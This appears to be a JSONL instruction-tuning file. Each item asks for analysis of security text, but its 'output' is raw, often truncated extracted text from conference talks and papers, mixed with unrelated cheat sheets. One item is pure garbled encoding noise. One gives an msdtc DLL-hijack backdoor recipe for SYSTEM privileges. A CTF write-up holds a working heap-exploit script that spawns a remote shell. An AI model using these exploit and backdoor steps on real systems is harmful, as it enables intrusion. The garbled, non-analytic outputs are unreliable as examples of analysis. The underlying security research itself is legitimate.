{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n! \" # $ % &  # ' ( ) ) * ) + * ) , ( - ' ( ) ' . + % / 0 1 2 3 4 5 2 6  7 8  8 \" #  # 7 9 \"  9 : 7 ; 8  \" 7 \" # 9 ; < = # 7 9 \" # 9 #   = # 9 \" 7 = \" # > 9 ? 8  8 \" # 9 \"   # @ 9 ;   < # 9 @ 9 A 7  8 ! 6  8 \" # > 9 ? 8 > 7   A ; 8 = 7 A ;  9 9 8  B C 9   9 > 7 \" D #  E F G @ 9 ;  9 C \" # > 9 ? 7 \" D ! H 9 @ @ 9 \" < 8 8 9 C #  8 \" # > 9 ? 8 > 7   A  8 \" # ; I  \" ; #   7 :  = B 7 @   7 =  # 7 9 \" 8 9 C 8 9 @ < 8 8 > 7   A J < 8 # 7 9 \" ; ! 6   8 \" #  # 7 9 \" > 7   = 9 \" =  < ; > 7 #   \" 7 \" # 9 ; < = # 7 9 \" # 9 E  \" E # # 9 I  C 8 9 C # >   \" ;   ; >   9 K = # 7 @   @ \" # 7 \" D #  \" # > 9 ?  9 # 9 = 9  8  : 7 9 < 8  B ; 8 = 7 A ; ! L M N O P Q R S T U V W X Y Z [ \\ Y ] Y  _ Y ` a b c _ d e L f g h i j k j i l m n o n i p j q r s f t u v w u x v y  z A 9 < # #  8   ?  {  B 8  9 <  ; G =  |  }  = ? D 9 < \" ; 9 \"  < # 9 @ 9 # 7 :  = # 9 \" 7 = 8  E } & ( ~ H 9 @ @ 9 \" < 8  D ~   B 8 7 =    \" ; ;  #   7 \" ? ~ & 7  D \" 9 8 # 7 = @ 9 ; 8 ~   7 8 # 7 \" D  9 ; < = # 8  E  \" E # # 9 f                   q n      n i  f  f g h i j k j i l m n o n i p j q r s f        v  v   v w   ; < =  # ; 7 \"   = # 7 =    \" ; H 9 @  < #  \" D 7 \" 7 \" D   9 C 8 8 7 9 \"     7 \" = 7 \"   ; >   \" ; 8 9 C # >  ; 8 7 D \"  F  # < ;  B  C # \" 9 9 \" @ =   \" 7 =  H 9 \" = \" ;  A 9 < #  7 :  = B f                   q n      n i  f  f g h i j k j i l m n o n i p j q r s f            w v   z < # 9 @ 9 A 7  @  7 \" # \"  \" = @ 9 \" 9  9  B ~ F : 7 = @  \" <   8  9 : 7 ; @ =   \" 7 =   ;  > 7 \" D 8 > 7 #  D  #  = = <  = B ~ ª 7 @ 7 # ;  = # 9 \" 7 = 8 =  @  # 7 = 8 I  7 @ 7 # ;  9 # 9 = 9  8  = 7  =  # 7 9 \" 8 I \" 9 8 9 < = = 9 ;   7 :  = B 7 @   7 =  # 7 9 \" 8 ~ {   # ; 9 8  :  7 =  = 9 ; |    7 =  @ 9 < \" ; = 9 \" # 9  9 C @  \" < C  = # < #   \" 9 > \" f                   q n      n i  f  f g h i j k j i l m n o n i p j q r s f      w      ²     ³   x u v   v   w   x  µ   \" ; #   9 9 ; ~ H 9 \" # 9   8 C 9 C <  7 \" K = # 7 9 \" I  \" # 7   9 = ? A  ? 8 I #  = # 7 9 \" = 9 \" # 9  I  7 A  D 8   8 : 7 8 7 A  ~ H  7 @  # = 9 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIM A NEWBIE YET I CAN HACK ZIGBEE Take Unauthorized Control Over ZigBee Devices LI Jun ,YANG Qing Unicorn Team  Radio and Hardware Security Research Qihoo 360 Technology Co. Ltd. Who we are? Unicorn Team  Qihoo360s UnicornTeam consists of a group of brilliant security researchers. We focus on the security of anything that uses radio technologies, from small things like RFID, NFC and WSN to big things like GPS, UAV, Smart Cars, Telecom and SATCOM.  Our primary mission is to guarantee that Qihoo360 is not vulnerable to any wireless attack. In other words, Qihoo360 protects its users and we protect Qihoo360.  During our research, we create and produce various devices and systems, for both attack and defense purposes. LI Jun  Hardware security intern in Unicorn Team of Qihoo360 ,China.  Second year graduate student at Chengdu University of Information Technology, China.He received his bachelors degree from University of Electronic Science and Technology of China  Interested in the security of the internet of things and the security of automobile electronics Twitter: bravo_fighter Weibo: GoRushing YANG Qing  YANG Qing is the team leader of Unicorn Team.  He has rich experiences in wireless and hardware security area, including WiFi penetration testing, cellular network interception, IC card cracking etc. His interests also cover embedded system hacking, firmware reversing, automotive security, and software radio.  He is the first one who reported the vulnerabilities of WiFi system and RF IC card system used in Beijing subway. Weibo: Ir0nSmith Why is this talk relevant to you   Cause hackers might be able to control your ZigBee enabled appliances without authorization, this talk will teach you how to prevent it . What will you learn from the talk  You will learn, step by step ,how to hack ZigBee enabled devices ,and you will also learn some techniques to protect your ZigBee appliance from being hacked. So what is ZigBee  ZigBee is the only open, global wireless standard t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmsdtc.exe是微软分布式传输协调程序该进程调用系统Microsoft Personal Web Server和Microsoft SQL Server该服务用于管理多个服 务器 msdtc.exe是一个并列事务是分布于两个以上的数据库消息队列文件系统或其他事务保护资源管理器删除要小心 对应服务MSDTC全称Distributed Transaction CoordinatorWindows系统默认启动该服务  对应进程msdtc.exe,位于%windir%system32 当Windows操作系统启动Microsoft分布式事务处理协调器MSDTC服务时攻击便开始了该服务可协调跨越多个资源管理器例如数 据库消息队列和文件系统的事务当目标计算机加入域时一旦MSDTC服务启动它将搜索注册表 当计算机加入域中MSDTC服务启动时会搜索注册表HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI 默认缺少oci.dll 直接生成一个dll放入到C:\\Windows\\System32,kill了msdtc.exe然后在重新执行即可利用 Evernote Export file:///C:/Users/JiuShi/Desktop/msdtc实现dll劫持后门.html 第1页 共2页 2020/10/8 23:41 由于默认权限很低对服务进行修改即可得到SYSTEM权限 参考链接:https://www.cnblogs.com/-qing-/p/11601618.html Evernote Export file:///C:/Users/JiuShi/Desktop/msdtc实现dll劫持后门.html 第2页 共2页 2020/10/8 23:41", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking the Cloud Gerald Steere  Microsoft C+E Red Team (@Darkpawh) Sean Metcalf  CTO Trimarc (@pyrotek3) Gerald Steere - @darkpawh 10+ years experience as a penetration tester and red team operator Member of C+E Red Team since 2014 Speaker at BlueHat and Bsides Seattle Spends work days happily smashing atoms in Azure About Us Sean Metcalf - @pyrotek3 Founder Trimarc, a security company. Microsoft Certified Master (MCM) Directory Services Speaker: Black Hat, BSides, DEF CON, DerbyCon, Shakacon, Sp4rkCon Security Consultant / Security Researcher Own & Operate ADSecurity.org (Microsoft platform security info) About Us + Cloud FTW! Whats in it for me? Staying clean while being mean Buzzword bingo with cloud lingo Pathfinding, recon, and targeting in multiple dimension Currency exchange  what do I do with all these hashes? Happy fun exploit time (with demos) Countermeasures and proper protection Cloud? Who cares! Whats in it for me? Cloud matters for business Your client probably uses it, whether you (or they) realize it or not Many traditional techniques do not work Same concepts but new ways of thinking Whats in it for me? When we last saw our intrepid red team Hired to red team SithCo Have domain admin on a subsidiary domain SithCo uses public cloud resources to host web applications Hacker Quest How do we leverage access to get into SithCo corporate? Staying clean while being mean Cause pissing off The Net is bad for business Can I really go after my clients cloud deployments? We are not lawyers. If youre a professional you need one of those to talk to ALWAYS. Staying Clean Lawful Evil is a perfectly valid alignment Scope & Access will be more limited Spell out enforced limitations in your reporting Cloud providers typically require an approval process be followed Staying Clean Attacking Azure, AWS, or Google Cloud Deployments Requires preapproval by account owner (Azure and AWS) Standard Rules of Engagement (RoE) stuff Limited to customer owned resources No DoS Can", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Awk date: 2020-12-31 15:18:34 background: bg-slate-600 tags: - bash - text - script categories: - Linux Command intro: | This is a one page quick reference cheat sheet to the [GNU awk](https://www.gnu.org/software/gawk/manual/gawk.html), which covers commonly used awk expressions and commands. plugins: - copyCode --- Getting Started --------------- ### Have a try ```shell script {.wrap} $ awk -F: '{print $1, $NF}' /etc/passwd ``` ---- | - | - | - | |---|---------------|---------------------------| | | `-F:` | Colon as a separator | | | `{...}` | Awk program | | | `print` | Prints the current record | | | `$1` | First field | | | `$NF` | Last field | | | `/etc/passwd` | Input data file | {.left-text} ### Awk program ``` BEGIN {<initializations>} <pattern 1> {<program actions>} <pattern 2> {<program actions>} ... END {< final actions >} ``` #### Example ``` awk ' BEGIN { print \"\\n>>>Start\" } !/(login|shutdown)/ { print NR, $0 } END { print \"<<<END\\n\" } ' /etc/passwd ``` ### Variables {.row-span-2} ```bash $1 $2/$(NF-1) $3/$NF     $0/NR   ID  WEBSITE  URI   $0/NR   1  quickref.me  awk   $0/NR   2  google.com  25   ``` --- ``` # First and last field awk -F: '{print $1,$NF}' /etc/passwd # With line number awk -F: '{print NR, $0}' /etc/passwd # Second last field awk -F: '{print $(NF-1)}' /etc/passwd # Custom string awk -F: '{print $1 \"=\" $6}' /etc/passwd ``` See: [Variables](#awk-variables) ### Awk program examples {.col-span-2 .row-span-2} ``` awk 'BEGIN {print \"hello world\"}' # Prints \"hello world\" awk -F: '{print $1}' /etc/passwd # -F: Specify field separator # /pattern/ Execute actions only for matched pattern awk -F: '/root/ {print $1}' /etc/passwd # BEGIN block is executed once at the start awk -F: 'BEGIN { print \"uid\"} { print $1 }' /etc/passwd # END block is executed once at the end awk -F: '{print $1} END { print \"-done-\"}' /etc/passwd ``` ### Conditions ``` awk -F: '$3>30 {print $1}' /etc/passwd ``` See: [Conditions](#awk-conditions) ### Generate 1000", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking Wind: Adventures in Hacking Wind Farm Control Networks Jason Staggs, Ph.D. University of Tulsa Tulsa, Oklahoma whoami  Security researcher  Focused on control systems and network security  PhD in Computer Science from The University of Tulsa  Cellular networks, security engineering and forensics  Presented How to Hack your Mini Cooper  @ DEFCON 21  CAN bus attacks and trickery  I enjoy trying to break things...  Sometimes I try to fix them  Sometimes people dont listen 2 **Disclaimer**  All affected parties have been notified of identified security issues that are about to be presented  I am NOT a power grid engineer!  Dont try this at home (without permission) 3 Why Hack a Wind Farm?  Wind energy  Becoming the predominant source of renewable energy  4.7% of electricity generated in the United States in 2015  Contribution expected to climb to 20% by 2030  Increased reliance on wind energy draws increased attention to attackers of all shapes and sizes  Modern wind farms are operated by computers and networks  Why should we care?  https://www.youtube.com/watch?v=wfzgIxMEo8g  Mechanical failures can be influenced by targeting insecure control networks!  But most importantly 4 To Prevent Attackers from Turning these Peaceful Symbiotic Systems 5 Into Targets of Ransomware or 6 Give me $$$$$ Into Massive Burning Wastelands 7 What is a Wind Farm?  Power plant that converts wind into electricity  Wind turbines  Variable power source that generates energy from wind  Substations  Collects the energy produced by wind turbines and feeds it into the power grid  SCADA systems/networks  Controls the wind turbines and substations  Mix of ICS and IT  IEC-61400-* specifications  Defines design, operations and communications requirements 8 Wind Farm Case Study  Exclusive access to five U.S. based wind farms  1000+ wind turbines  Multiple equipment models from five major vendors  Research spanning nearly 2 years  Assessed control systems/networks, IT systems and physical secur", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nArt by Francesco Ciccolella www.francescociccolella.com Inside the Fake Science Factory Svea, Chris & Till Presented at DEF CON 26. Las Vegas 11th August 2018. Talk questions + answers 16.45 This talk Documentary Longer questions + answers 17.45 16.00 Design Conduct experiments Preliminary results Writing paper Feb 2016 Feb 2017 August 2016 Reasonably far Research paper progress HAHAHAHAHA, HAHAHAHAHA, no. wasetwatch.wordpress.com Predatory Publishing Predatory conferences or predatory meetings are meetings set up to appear like legitimate scientific conferences but which are exploitative as they do not provide proper editorial control over presentations and advertising can include claims of involvement of prominent academics who are, in fact, uninvolved. Source: Wikipedia Predatory publishers hurt scientists, science, and the communication of science. They trick scientists, pretending to operate as legitimate publishers, when they are essentially counterfeit and only seeking to earn a quick profit. Jeffrey Beal 23 media partners 60+ journalists We need some help! We need some help! Credits: Jeremy Stribling, Max Krohn, Dan Aguayo (2005) Source: https://pdos.csail.mit.edu/archive/scigen/ A Sting Operation Art by Francesco Ciccolella www.francescociccolella.com Highly-Available, Collaborative, Trainable Communication - a policy neutral approach Christian Schreibaumer, Ph. D. Isabella Stein University of Applied Sciences of Lower Saxony at Himmelpforten International Conference on Systems, Computing and Software Engineering, London 2018 Video - WASET Art by Francesco Ciccolella www.francescociccolella.com Fake Cancer Cures Miracle Cancer cures Bees are awesome. Can they heal cancer? Probably not. But who knows? This is a non-scientific approach, just to make money. Miracle Cancer cures that arent Reviewer comments: \"The study provided important experimental and pre-clinical evidences demonstrating the potential application of Bio99TM propolis in cancer treatment.\" \"Au", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWriteUp By Nu1L Author:Nu1L WriteUp By Nu1L PWN wind_farm_panel shell Misc babymaze2_beta babymaze1 WEB hello_php ezcms easyci Crypto babyLWE digits_missing RE friendlyRE PWN wind_farm_panel free, Orange+FSOP from pwn import * # s = process(\"./pwn\") s = remote(\"182.92.203.154\",\"28452\") def add(idx,size,buf): s.sendlineafter(\"3.Modify wind turbine information\",\"1\") s.sendlineafter(\"Please enter the wind turbine to be turned on(0 ~ 5): \",str(idx)) s.sendlineafter(\"lease input the maximum power of this wind turbine:\",str(size)) s.sendafter(\"Your name: \",buf) def edit(idx,buf): s.sendlineafter(\"3.Modify wind turbine information\",\"3\") s.sendlineafter(\"Which turbine: \",str(idx)) s.sendafter(\"Please input: \",buf) def show(idx): s.sendlineafter(\"3.Modify wind turbine information\",\"2\") s.sendlineafter(\"Please select the number of the wind turbine to be viewed: \",str(idx)) add(0,0x200,'1\\n') edit(0,'A'*0x200+p64(0)+p64(0xdf1)) add(1,0x1000,'\\n') add(2,0x200,'\\n') show(2) offset = u64(s.recvuntil(\"\\x7f\")[-6:]+\"\\x00\\x00\")-0x3c510a success(hex(offset)) libc = ELF(\"./libc-2.23.so\",checksec=False) libc.address = offset _IO_list_all = libc.sym['_IO_list_all'] _IO_str_jumps = libc.address+0x3c37a0 system = libc.sym['system'] sh = next(libc.search(\"/bin/sh\")) context.arch='amd64' fmt = FileStructure() fmt._IO_buf_base = sh fmt._IO_write_ptr = 1 fmt.vtable = _IO_str_jumps-8 payload = str(fmt).ljust(0xe8,'\\x00')+p64(system) payload = payload[0x20:] print(len(payload)) edit(2,'A'*0x200+p64(0xfbad2084)+p64(0x61)+p64(0)+p64(_IO_list_all- 0x10)+payload+\"\\n\") s.sendlineafter(\"3.Modify wind turbine information\",\"1\") s.sendlineafter(\"Please enter the wind turbine to be turned on(0 ~ 5): \",\"4\") s.sendlineafter(\"lease input the maximum power of this wind turbine:\",str(0x100)) s.interactive() shell bg Misc from pwn import * # s = process(\"./pwn\") s = remote(\"182.92.203.154\",\"35264\") def bg(buf): tmp = \"bg %1\"+buf s.sendlineafter(\"$ \",tmp) bg(\"AAAA%12$pBBBB\") s.recvuntil(\"AAA\") elf = ELF(\"./pwn\")", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Invisible Finger: Practical Electromagnetic Interference Attack on Touchscreen-based Electronic Devices Haoqi Shan1, Boyi Zhang1, Zihao Zhan1, Dean Sullivan2, Shuo Wang1, Yier Jin1 1: University of Florida 2. University of New Hampshire #BHUSA @BlackHatEvents Information Classification: General Invisible Finger Remote precise touch events injection attack against capacitive touchscreens using IEMI signal INVISIBLE FINGER #BHUSA @BlackHatEvents Information Classification: General TL;DR  Invisible Finger  Remote precise touch events injection attack against capacitive touchscreens using IEMI signals.  Effective attack distance ~3cm  Can induce short-tap, long-press, omnidirectional swipe gesture  Works on different touchscreen devices, different scanning methods  A practical attack with out-of-sight screen locator and touch event detectors https://invisiblefinger.click #BHUSA @BlackHatEvents Information Classification: General TL;DR  Invisible Finger  Remote precise touch events injection attack against capacitive touchscreens using IEMI signals.  Effective attack distance ~3cm  Can induce short-tap, long-press, omnidirectional swipe gesture  Works on different touchscreen devices, different scanning methods  A practical attack with out-of-sight screen locator and touch event detectors https://invisiblefinger.click INVISIBLE FINGER #BHUSA @BlackHatEvents Information Classification: General TL;DR  Invisible Finger  Remote precise touch events injection attack against capacitive touchscreens using IEMI signals.  Effective attack distance ~3cm  Can induce short-tap, long-press, omnidirectional swipe gesture  Works on different touchscreen devices, different scanning/driving methods  A practical attack with out-of-sight screen locator and touch event detectors INVISIBLE FINGER https://invisiblefinger.click #BHUSA @BlackHatEvents Information Classification: General TL;DR  Invisible Finger  Remote precise touch events injection attack against capaciti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvanced Inter-Process Desynchronization in SAPs HTTP Server Martin Doyhenard Onapsis mdoyhenard@onapsis.com Abstract This paper will demonstrate how to leverage two memory corruption vulnerabilities found in SAP's proprietary HTTP Server, using high level protocol exploitation techniques. Both, CVE-2022-22536 and CVE-2022-22532, were remotely exploitable and could be used by unauthenticated attackers to completely compromise any SAP installation on the planet. By escalating an error in the HTTP request handling process, it was possible to Desynchronize ICM data buffers and hijack every users account with advanced HTTP Smuggling. Next, this paper will examine a Use After Free in the shared memory buffers used for Inter-Process Communication. By exploiting an incorrect deallocation, it was possible to tamper messages belonging to other TCP connections and take control of all responses using Cache Poisoning and Response Splitting theory. Finally, as the affected buffers are also used to contain Out Of Bounds data, a method to corrupt address pointers and obtain Remote Code Execution will be explained. The ICMAD vulnerabilities were addressed by the US Cybersecurity and Infrastructure Security Agency as well as CERTs from all over the world, proving the tremendous impact they had on enterprise security. Outline Abstract 1 Outline 2 Introduction 3 ICM Architecture 3 Overview 3 Internal Handlers 4 Memory Pipes 5 MPI Handler 5 MPI Buffers 5 HTTP WorkFlow 6 Step 1: Init/recover Connection 6 Step 2: Receive the Request 7 Step 3: Parse Request Headers 7 Step 4: ICM SubHandlers 8 Step 5: Communicate Response 9 Step 6: Dispatch Response 10 Step 7: Clean MPI Buffers 10 MPI Desynchronization 10 CVE-2022-22536 10 ICM Response Smuggling 11 Browser-Backend Desync 13 MPI Use-After-Free 14 CVE-2022-22532 14 Buffer Hijacking 15 HTTP Message Tampering 16 OOB Buffer Tampering 17 Conclusion 18 Introduction The SAP Internet Communication Manager (ICM) is one of the most important componen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ngrub2-mkconfig === 生成 grub.cfg 配置文件 ## 语法 ```shell 用法: grub2-mkconfig [OPTION] 生成 grub 配置文件 -o, --output=FILE 将生成的配置输出到 FILE 文件 [default=stdout] -h, --help 打印这个文件并退出 -v, --version 打印版本信息并退出 报告 Bug 通过 <bug-grub@gnu.org>. ``` ## 实例 生成新的grub配置文件 ```shell grub2-mkconfig -o /boot/grub2/grub.cfg # 或者 grub2-mkconfig > /boot/grub2/grub.cfg ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking SSL using time synchronisation attacks Jose Selvi, Senior Security Consultant  Jose%Selvi%  +10%years%working%in%security%  Senior%security%Consultant%  SANS%Institute%Community%Instructor%  GIAC%Security%Expert%(GSE)%  Twitter:%@JoseSelvi%  Blog:%http://www.pentester.es $ whois jselvi Valencia: Beach, Sun & Hacking Warning! Spanish accent! Lets Go!  Modern Time Synchronisation  Get in a Delorean  HTTP Strict Transport Security  Windows task scheduler  Public Key Infrastructure  Conclusions & Recommendations Network Time Protocol (NTP)  Time%Synchronisation%Services.%  RFCK1305%(v3)%/%RFCK5905%(v4)%/%RFCK4330% (SNTPv4).%  By%default%in%(almost)%all%operating%systems.%  No%secured%by%default.%  Vulnerable%to%ManKinKtheKMiddle%attacks. NTP Packet Example: Ubuntu Linux Mac OS X - Mavericks  New%synchronisation%service%  NTP%daemon%exits,%but%not%synchronises.%  Just%writes%in%/var/db/ntp.drift%  A%new%service%called%pacemaker%check% that%file%and%change%the%clock.%  It%seems%it%doesnt%work%as%it%should http://www.atmythoughts.com/livingKinKaKtechKfamilyKblog/2014/2/28/whatKtimeKisKit Does NTP work? /usr/libexec/ntpd-wrapper Mac OS X - Mavericks Fedora Linux  The%easiest%  NTPv3.%  More%than%one%NTP%server%  Requests%each%minute! $%tcpdump%Ki%eth0%Knn%src%port%123% 12:43:50.614191%IP%192.168.1.101.123%>%89.248.106.98.123:%NTPv3,%Client,%length%48% 12:44:55.696390%IP%192.168.1.101.123%>%213.194.159.3.123:%NTPv3,%Client,%length%48% 12:45:59.034059%IP%192.168.1.101.123%>%89.248.106.98.123:%NTPv3,%Client,%length%48 Ubuntu Linux  Very%simple%  NTPv4.%  Each%time%it%connects%to%a%network%(and%at% boot%time,%of%course). $%ls%/etc/network/ifKup.d/% 000resolvconf%%avahiKdaemon%%ntpdate%%wpasupplicant% avahiKautoipd%%%ethtool%%%%%%%%%%%%%upstart Windows  NTPv3%but%  The%most%secure.%  Synchronisation%each%7%days.%  More%than%15%hours%drift%isnt%allowed.%  Domain%members%work%in%a%different% way. W32time service Max[Pos|Neg]PhaseCorrection W7 / W8 15 horas W2K12 48 horas ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMobile App Moolah: Profit taking with Mobile Malware Jimmy Shah Mobile Security Researcher Mobile App Moolah: Profit taking with Mobile Malware 2  Who we are  Mobile malware  Modern for-profit malware  Examples Contents Mobile App Moolah: Profit taking with Mobile Malware 3 Who we are  Mobile Antivirus Researchers  My team and I specialize in mobile malware and threat analysis on existing(J2ME, SymbOS,WM, Apple iOS, Android) and upcoming mobile platforms.  We work with a number of large mobile network operators. Mobile App Moolah: Profit taking with Mobile Malware 4 Mobile Malware In the Wild Historical For-profit malware Trends Mobile App Moolah: Profit taking with Mobile Malware 5 In the Wild SymbOS J2ME Android Python WinCE MSIL VBS BlackBerry Exploit Linux OSX 1200+ variants Mobile App Moolah: Profit taking with Mobile Malware 6 Mobile Malware In the Wild Historical For-profit malware Trends Mobile App Moolah: Profit taking with Mobile Malware 7  What it does  First reported J2ME trojan(2006)  Pretends to access WAP web pages via SMS messages  Written using the MIDletPascal programming tool  Profit?  In reality, it attempts to send SMS messages to Premium Rate SMS numbers  Eventually spawned a large number of J2ME malware/variants J2ME/Redbrowser.A RedBrowser installation prompt (Symbian OS, S60 UI) Carefully read following description of RedBrowser program This program allows viewing WAP pages without GPRS connection. RedBrowser connects to SMS server of your operator (MTS, BEELINE, MEGAFON). Page is loaded by receiving coded SMS. First 5Mb (650 SMS) of traffic are provided free of charge in test mode. ATTENTION!!! Program RedBrowser works ONLY on above mentioned cellular operators. description text (original text in Russian) Mobile App Moolah: Profit taking with Mobile Malware 8 J2ME/Wesber.A  What it does  No GUI, almost pure for-profit J2ME trojan  Program that disguises itself as an assistant program  It contains two jpg files within itself.  Profit?  Sends", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTV White Spaces: The Next Wi-Fi? Doug Mohney Editor-in-Chief VON Magazine DEFCON 15, August 2007 Who am I ? 30 second intro  Contributor to Mobile Radio Technology (www.mrtmag.com) since January 2003.  Hearing policy wonks talk about 700 MHz, unlicensed spectrum in D.C. for years.  Day job: Editor-in-Chief, VON Magazine  Feb 2007 Interview, Phil Zimmermann  http://vonmag.com/editorial/pioneer/philip- zimmermann-creator-of-pretty-good-privacy- interview Unlicensed TV White Spaces  What is White Spaces?  How did the concept get created?  Technical proposals - History  Tech Specifics as of July 31, 2006  Final Word in October What is White Spaces?  Analog/NTSC TV uses VHF and UHF  Today we have TV channels 2-69  As of Feb 18, 2009, channels 2-51 will be for TV, and all digital  (Assuming no last minute political panic)  In any given geographic area, one can receive only a handful of stations due to geography, careful licensing  51 channels -handful = LOTS of open unused, white spaces channels  Each DTV channel = 6 MHz, 27 Mbps broadcast bandwidth using existing DTV spec Why is the 700 MHz RF band loved and coveted by all?  Propagation characteristics  Go through walls, obstacles  In a licensed use mode, one can cover a city with 1 or 2 base stations vs. lots of cells/transmitters in Wi-Fi and higher frequencies.  Theres a lot of white spaces space available, the farther away from cities you go.  Policy wonks see this as a savior for the Digital Divide in Rural America FYI: Theres a lot of lurking LICENSED 700 MHz space  First auction  Lot of speculators sitting on it  Largest Aloha Networks, Vulcan Ventures  Second auction coming up  Speculation cable, Google, others may raise money  Lot of political in-fighting on how it should be conducted  Google pushing for liberalized auction rules  CTIA (the cell guys) like current model How did White Spaces created?  Review of spectrum policy by wonks  Hey, theres all this bandwidth  New America Foundation (www.newamerica.net)  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Framer X date: 2022-11-23 16:23:31.701096 background: bg-[#2151ed] label: Mac tags: - - mac categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 45 keyboard shortcuts found in Framer X. This application is MacOS-only. --- Keyboard Shortcuts ------------------ ### Tools Shortcut | Action ---|--- `F` | Frame `U` | Round `T` | Text `S` | Stack `L` | Link `Space` | Pan Canvas {.shortcuts} ### Graphics Shortcut | Action ---|--- `G` | Graphic `P` | Path `R` | Rectangle `O` | Oval `V` | Vector `Cmd` `G` | Group `Cmd` `Shift` `G` | Ungroup {.shortcuts} ### Layout Shortcut | Action ---|--- `Cmd` `Enter` | Add Frame `Cmd` `Opt` `Enter` | Add Stack `Cmd` `Del` | Remove Wrapper `Cmd` `Opt` `Up` | Move Forward `Cmd` `Opt` `Down` | Move Backward {.shortcuts} ### Components Shortcut | Action ---|--- `Cmd` `K` | Create from Design `Cmd` `Shift` `K` | Create from Code {.shortcuts} ### Text Shortcut | Action ---|--- `Cmd` `B` | Bold `Cmd` `I` | Italic `Cmd` `U` | Underline `Cmd` `T` | Select Typeface {.shortcuts} ### Editing Shortcut | Action ---|--- `Cmd` `(arrows)` | Object Size `Cmd` `Shift` `(arrows)` | Object Size by 10px `0-9` | Opacity `Opt` | Show Distance `Cmd` `D` | Duplicate in Place `Cmd` `Opt` `C` | Copy Style `Cmd` `Opt` `V` | Paste Style `Ctrl` `C` | Color Picker `Cmd` `A` | Select All Layers `Cmd` `Shift` `A` | Select All Siblings `Cmd` `Opt` `A` | Select All Children {.shortcuts} ### View Shortcut | Action ---|--- `Z` | Zoom `Cmd` `+` | Zoom In `Cmd` `-` | Zoom Out `Cmd` `1` | Zoom to Fit `Cmd` `2` | Zoom to Fit Selection `Cmd` `0` | Zoom to 100% `Ctrl` `R` | Show Rulers {.shortcuts} ### Window Shortcut | Action ---|--- `Cmd` `M` | Minimize `Cmd` `Shift` `1` | Welcome `Cmd` `P` | Preview {.shortcuts} Also see -------- - [Keyboard shortcuts for Framer X](https://www.framer.com/support/using-framer-x/shortcuts/) _(www.framer.com)_", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacker in the Wires Phil Polstra Bloomsburg University of Pennsylvania @ppolstra http://philpolstra.com What is this talk about?  A hacking device that lives on a gigabit Ethernet wire  Device is a CatchWire from WAW Technologies  Running  Multiple command & control / exfiltration options  Network on which it is installed  Remote control via IEEE 802.15.4/ZigBee  Cellular network Why should you care?  CatchWire running Deck Linux is  Small  Flexible  Can be networked to integrate into sophisticated pentests  Easily installed  Data center: get all the packets  LAN segment: target part of the organization  Inline to single PC: laser focus  Unused desk: bypass all perimeter defenses Who am I?  Professor at Bloomsburg University teaching digital forensics & information security  Author: Linux Forensics & HPTWLPD  Programming from age 8  Hacking hardware from age 12  Also known to fly, build planes, and do other aviation stuff  Course author for PentesterAcademy.com and others Roadmap  Introduction to the CatchWire  Introduction to The Deck Linux  Attacks from CatchWire or BeagleBone Black (BBB)  CatchWire specific attacks  Future Directions Meet the CatchWire  Formerly Little Universal Netwwork Appliance (LUNA)  Like BeagleBone Black (BBB) except:  Two gigabit Ethernet interfaces  Power over Ethernet (PoE)  Integerated FTDI USB to UART  No HDMI or GPIO headers CatchWire: Block Diagram CatchWire: Hardware CatchWire: Hardware (cont.)  Base OS  Built on Ubuntu 14.04  Optimized for pentesting with the BBB, CatchWire, and similar  Use as dropbox or hacking console  Over 4000 packages pre-installed (fluff free)  MeshDeck  Adds remote control via 802.15.4/ZigBee networking  Allows coordinated attacks with multiple remote drones  AirDeck  Combined with the MeshDeck to allow airborne drone or router  4Deck  Forensic add-on that automatically write blocks USB mass storage devices (udev rules-based)  Udeck (USB-based attacks)  This is what my other talk (tomorrow) is about Powerin", "category": "text_analysis", "source": "security_papers"}
